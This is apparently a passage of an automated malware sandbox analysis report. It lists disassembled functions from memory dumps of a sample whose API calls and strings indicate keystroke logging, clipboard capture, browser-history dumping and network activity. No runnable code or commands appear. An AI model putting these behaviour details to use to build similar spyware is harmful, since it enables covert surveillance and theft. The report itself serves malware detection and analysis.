                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                • Opcode ID: 93326e6fe8127fa770a213a75eafb51b49b556a0e1de58e73a94d5ac31cb3bc8
                                                                                                                                                                • Instruction ID: 2e0202eb7e54ef27903abead3444b9f26056892ee0c67d5ba1a795f193607207
                                                                                                                                                                • Opcode Fuzzy Hash: 93326e6fe8127fa770a213a75eafb51b49b556a0e1de58e73a94d5ac31cb3bc8
                                                                                                                                                                • Instruction Fuzzy Hash: 2941297190020AEFDF06CF94C981ADE7FB5BF48308F24809AF924A6261D335E951DB61
                                                                                                                                                                Function 00064175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0006418F
                                                                                                                                                                  • Part of subcall function 00079B58: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,000641A5), ref: 00079B7F
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
                                                                                                                                                                  • Part of subcall function 0007689B: CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
                                                                                                                                                                  • Part of subcall function 0007A6EF: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • Sleep.KERNEL32(000000FA,000C2544), ref: 00064261
                                                                                                                                                                Strings
                                                                                                                                                                • /sort "Visit Time" /stext ", xrefs: 000641DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                • String ID: /sort "Visit Time" /stext "
                                                                                                                                                                • API String ID: 368326130-1573945896
                                                                                                                                                                • Opcode ID: e964e64adbbc09a84662b79a5c0d34ef5a7d0b39cb7d06c63069b7cd145e026f
                                                                                                                                                                • Instruction ID: c7877cb6bb5313dbf93f8e5d957ba9f238ac8b3ccee9aff9a1f9384a451988e7
                                                                                                                                                                • Opcode Fuzzy Hash: e964e64adbbc09a84662b79a5c0d34ef5a7d0b39cb7d06c63069b7cd145e026f
                                                                                                                                                                • Instruction Fuzzy Hash: 0B313431A041185BDB18FBB4DCA6AEEB77BAF90300F400179F50667193EF345E49CA91
                                                                                                                                                                Function 6FE7F7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • getaddrinfo.WS2_32(?,00000000,?,?), ref: 6FE7F863
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6FE7F870
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastgetaddrinfo
                                                                                                                                                                • String ID: tzo
                                                                                                                                                                • API String ID: 4160901379-1584091749
                                                                                                                                                                • Opcode ID: 2c9879ebc5e31381352e4d8f2a7f9e11026006d73120854fbad8d009bb4d65da
                                                                                                                                                                • Instruction ID: dcfef79324ff809ff3d2cdf12f9d184918762646856237e64335b065f3674733
                                                                                                                                                                • Opcode Fuzzy Hash: 2c9879ebc5e31381352e4d8f2a7f9e11026006d73120854fbad8d009bb4d65da
                                                                                                                                                                • Instruction Fuzzy Hash: 1B315E759003099FEB10DF64D984ADEBBF8EF46314F60845AE849A7350E735AA84CBA1
                                                                                                                                                                Function 0006B2F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00092100: __onexit.LIBCMT ref: 00092106
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0006B347
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                • API String ID: 1881088180-3686566968
                                                                                                                                                                • Opcode ID: 16320864f7a3f108858fbf8a5968a49332d6adda3b909fe498c75b8e75725add
                                                                                                                                                                • Instruction ID: 56572f53d7fb930b0aceb97b81a92e1ece2efed31791cd186d40e21687a64b5b
                                                                                                                                                                • Opcode Fuzzy Hash: 16320864f7a3f108858fbf8a5968a49332d6adda3b909fe498c75b8e75725add
                                                                                                                                                                • Instruction Fuzzy Hash: 21317331A101198BDB18FBA4DC92EEDB37AAF50310F544129F506A7293DF345E4ACB91
                                                                                                                                                                Function 0006510E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocalTime.KERNEL32(0007400C,000D2568,00000000,?,?,?,?,?,?,0007400C,?,00000001,0000004C,00000000), ref: 00065145
                                                                                                                                                                  • Part of subcall function 000797D0: GetLocalTime.KERNEL32(00000000), ref: 000797EA
                                                                                                                                                                • GetLocalTime.KERNEL32(0007400C,000D2568,00000000,?,?,?,?,?,?,0007400C,?,00000001,0000004C,00000000), ref: 0006519D
                                                                                                                                                                Strings
                                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0006513A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LocalTime
                                                                                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                • API String ID: 481472006-1507639952
                                                                                                                                                                • Opcode ID: caf425b5582963af465d3975df1b832f8486268ca44ed5a344fd0a3a62d0a51c
                                                                                                                                                                • Instruction ID: 783364b40c3f7f88da7f9a278296d6ff4731e43a87eccaa96598de231a391a6f
                                                                                                                                                                • Opcode Fuzzy Hash: caf425b5582963af465d3975df1b832f8486268ca44ed5a344fd0a3a62d0a51c
                                                                                                                                                                • Instruction Fuzzy Hash: A821E761E01A406BFB14FB78FC2ABDE7BB65B16306F504159EC0217157DA390A48C7B2
                                                                                                                                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strlen
                                                                                                                                                                • String ID: : $Se.
                                                                                                                                                                • API String ID: 4218353326-4089948878
                                                                                                                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                Function 6FE8DC40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _fwprintf.LIBCONCRTD ref: 6FE8DCC4
                                                                                                                                                                  • Part of subcall function 6FE8DF70: _fread.LIBCMTD ref: 6FE8DF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fread_fwprintf
                                                                                                                                                                • String ID: $%02x
                                                                                                                                                                • API String ID: 2879884958-2181446322
                                                                                                                                                                • Opcode ID: 0e67fd306d4e7e4a6a531ba49e769a6e9b50fa24c08fb0cdd953caeb7b0d84e5
                                                                                                                                                                • Instruction ID: cf81bc738dd1fd51750e041ae066f8533fd0e218b50219279eedd59886ee307c
                                                                                                                                                                • Opcode Fuzzy Hash: 0e67fd306d4e7e4a6a531ba49e769a6e9b50fa24c08fb0cdd953caeb7b0d84e5
                                                                                                                                                                • Instruction Fuzzy Hash: 86115174D04208ABDF24DFA8C450B9D7FB2AF40308F2481AEE9199B341D775AA51DB82
                                                                                                                                                                Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                Function 000A52D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsValidLocale.KERNEL32(00000000,5A,00000000,00000001,?,?,000A4135,?,?,?,?,00000004), ref: 000A5323
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LocaleValid
                                                                                                                                                                • String ID: 5A$IsValidLocaleName
                                                                                                                                                                • API String ID: 1901932003-1484227129
                                                                                                                                                                • Opcode ID: dd9981a13c5abab7d78f58ca94b02dab68ea7dc8df7206c2ea972330aad14a9b
                                                                                                                                                                • Instruction ID: aafba483bb55dd5274b4f0312468a107a78636033c4749522ea2cf0ddde5a393
                                                                                                                                                                • Opcode Fuzzy Hash: dd9981a13c5abab7d78f58ca94b02dab68ea7dc8df7206c2ea972330aad14a9b
                                                                                                                                                                • Instruction Fuzzy Hash: 7FF02E31A41A18B7EF206BA4DC06FDE7B95EF45B52F000115FD057A293CAB55D4055D4
                                                                                                                                                                Function 0006B1ED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0006B1F2
                                                                                                                                                                  • Part of subcall function 00069F7D: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00069FB1
                                                                                                                                                                  • Part of subcall function 00069F7D: GetWindowThreadProcessId.USER32(00000000,?), ref: 00069FBC
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyboardLayout.USER32(00000000), ref: 00069FC3
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyState.USER32(00000010), ref: 00069FD0
                                                                                                                                                                  • Part of subcall function 00069F7D: GetKeyboardState.USER32(?), ref: 00069FDD
                                                                                                                                                                  • Part of subcall function 00069F7D: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00069FFB
                                                                                                                                                                  • Part of subcall function 00069F7D: ToUnicodeEx.USER32(?,?,?,00000010,00000000,?), ref: 0006A064
                                                                                                                                                                  • Part of subcall function 0006A1D3: SetEvent.KERNEL32(00000000,00000000,00000000,?,0006ADB1,00000000), ref: 0006A200
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                • String ID: [AltL]$[AltR]
                                                                                                                                                                • API String ID: 2738857842-2658077756
                                                                                                                                                                • Opcode ID: 00200f470b9ddf4b11f7b5ccb59fa8be9f4e6b68a93141257e4b749bfc558919
                                                                                                                                                                • Instruction ID: 4997ecd9cb97d365a8d09866d59e595559f8fb677a01ad68f21f851dcccc9121
                                                                                                                                                                • Opcode Fuzzy Hash: 00200f470b9ddf4b11f7b5ccb59fa8be9f4e6b68a93141257e4b749bfc558919
                                                                                                                                                                • Instruction Fuzzy Hash: 2BE0122134061116D8E8367D6D2BAFE39D39B93B60F80014DF942DFA97DE5A4E9143C3
                                                                                                                                                                Function 0006B247 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 0006B24C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: State
                                                                                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                • API String ID: 1649606143-2446555240
                                                                                                                                                                • Opcode ID: 092b4f2937bbbec39274f9826d6fc9f78a2acdf35eb9792195f8dbd8679d99bf
                                                                                                                                                                • Instruction ID: 4ab1d0ea1e547b82aa5c91193800cf365f366f6f692e34f16ff57801adac8429
                                                                                                                                                                • Opcode Fuzzy Hash: 092b4f2937bbbec39274f9826d6fc9f78a2acdf35eb9792195f8dbd8679d99bf
                                                                                                                                                                • Instruction Fuzzy Hash: CBE0866130031152D8F43A3D5A6AAAD39D29B56761F40012CE482DF586DA5B498452C2
                                                                                                                                                                Function 6FE98C6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(6FED41E0), ref: 6FE98C88
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: 8Bo$Ao
                                                                                                                                                                • API String ID: 3664257935-321205115
                                                                                                                                                                • Opcode ID: 3118f882052b765a1bf8ad8c6b5f495bbbf67441ca11e43bac81599d08569aba
                                                                                                                                                                • Instruction ID: 053f909465953ede0daaacbbfe7b6f3d2279035fc3e385747aab6d35a5e5a8aa
                                                                                                                                                                • Opcode Fuzzy Hash: 3118f882052b765a1bf8ad8c6b5f495bbbf67441ca11e43bac81599d08569aba
                                                                                                                                                                • Instruction Fuzzy Hash: F2E07D3280A21597D7200F08C0047C47FE86B1133AF71022BE4FC152F0D27269D2C693
                                                                                                                                                                Function 10007103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                                • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                                                                                                                • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                                                • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                                                                                                                Function 6FE9C108 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                • Opcode ID: 5103efb63bf80b55a305730b14d9c5683db1db92d7c567005a4d9914295c33d9
                                                                                                                                                                • Instruction ID: 67618e2699130a5c1dac53d931e775d9e569e6dc7e16834baad951d0be0f03d1
                                                                                                                                                                • Opcode Fuzzy Hash: 5103efb63bf80b55a305730b14d9c5683db1db92d7c567005a4d9914295c33d9
                                                                                                                                                                • Instruction Fuzzy Hash: 48B048B8800A008F8F108F28A1485083EA1BBAB22238000A6D426C2A40E73400B4CA00
                                                                                                                                                                Function 000AA27A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                • String ID: h%{
                                                                                                                                                                • API String ID: 3253501508-2527149017
                                                                                                                                                                • Opcode ID: a2eb57c56821f66a46967c53e45cfa7f12062eb583311193f5e49872c94ff755
                                                                                                                                                                • Instruction ID: 84cfa3f6e8a5bf75e8bf68387e7e9145a8d45ecfa34cd745a6faebc7c20cac8b
                                                                                                                                                                • Opcode Fuzzy Hash: a2eb57c56821f66a46967c53e45cfa7f12062eb583311193f5e49872c94ff755
                                                                                                                                                                • Instruction Fuzzy Hash: BBB092B98002118FE7409F39BC0C4947FE1B3082023845A75D80AC2B31D73E4005DF02
                                                                                                                                                                Function 6FE80160 Relevance: 5.1, APIs: 4, Instructions: 75COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,00000001,00000000,?,?,00000100,6FEAEA54,6FEAEB80), ref: 6FE80172
